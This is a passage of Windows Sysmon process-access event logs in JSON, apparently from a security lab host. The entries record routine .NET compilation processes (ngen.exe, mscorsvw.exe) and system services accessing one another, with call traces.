{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.450\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105D380C00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.450","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105D380C00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.450\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105D380C00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.450","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105D380C00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.450\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105D380C00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.450","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105D380C00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.497\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00100B3C0C00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.497","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00100B3C0C00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.497\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00100B3C0C00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.497","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00100B3C0C00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.497\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00100B3C0C00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.497","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00100B3C0C00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.528\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010913F0C00}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.528","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010913F0C00}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.528\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010913F0C00}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 